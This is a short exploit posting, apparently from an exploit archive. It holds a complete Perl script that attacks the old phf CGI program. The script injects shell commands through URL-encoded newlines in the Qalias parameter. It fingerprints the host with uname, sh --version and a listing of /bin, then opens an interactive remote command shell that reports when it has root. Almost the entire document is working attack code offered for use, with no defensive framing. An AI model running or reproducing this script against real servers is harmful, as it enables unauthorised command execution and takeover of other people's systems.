New script that exploits the very, very, very old phf vulnerability.
019371e115ef1e5f7c22f50f06a0b178a7b66d03de1c24b4361814c83f8f415f
#!/usr/bin/perl
# greets to josh arielle matt carley
use WWW::Mechanize;
if (scalar(@ARGV) < 1) {
print "\n --=== PHF00z3 by Oxagast ===--\n\n";
print " useage: ./$0 hostname\n\n";
print " Play Nice :)\n";
exit();
}
$scrape = WWW::Mechanize->new(timeout => 3);
print "Connecting...\n";
print "Checking if exploitable...\n";
$scrape->get("http://@ARGV[0]/cgi-bin/phf?Qalias=%0Auname%20-a");
$unamea = $scrape->content();
@unameafeed = split(/\n/, $unamea);
for $stupidpres (0..scalar(@unameafeed)) {
if (@unameafeed[$stupidpres] =~ m/<PRE>/) {
$realunamea = @unameafeed[$stupidpres+1];
}
}
$scrape->get("http://@ARGV[0]/cgi-bin/phf?Qalias=%0Ash%20--version");
$shver = $scrape->content();
@shverfeed = split(/\n/, $shver);
for $stupidpres (0..scalar(@shverfeed)) {
if (@shverfeed[$stupidpres] =~ m/<PRE>/) {
@shverfeed[$stupidpres+1] =~ m/version (\d+\.\d)/;
if ($1 ne "") {
$realshver = "sh-$1";
}
}
}
$scrape->get("http://@ARGV[0]/cgi-bin/phf?Qalias=%0Als%20%20/bin");
$scraped = $scrape->content();
if($scraped =~ /chmod/m) {
if($scraped =~ /mkdir/m) {
if($scraped =~ /stty/m) {
$startup = 1;
$rootus = 0;
while (0 < 1) {
if ($startup == 1) {
$cmd = "id";
}
if ($startup == 0) {
if ($rootus == 0) {
print "$realshver\$ ";
}
if ($rootus == 1) {
print "$realshver\# ";
}
$cmd = <STDIN>;
}
$scrape->get("http:\/\/@ARGV[0]/cgi-bin/phf?Qalias=%0A$cmd");
$scraped = $scrape->content();
@feedback = split(/\n/, $scraped);
for $line (0..scalar(@feedback)) {
if (@feedback[$line] eq "<PRE>") {
$outs = $line + 1;
}
}
for $outline ($outs..scalar(@feedback)-2) {
if ($startup == 1) {
if (@feedback[$outline] =~ /\(root\)/) {
print "OOooooo now look what we have here... :P r00t\n";
print "$realunamea\n";
$rootus = 1;
}
else {
print "We got ourselves a shell... :)\n";
print "$realunamea\n";
}
}
print "@feedback[$outline]\n";
$startup = 0;
}
}
}
}
}
else {
print "OOps, doesn't look like she's vulnerable. :(\n";
}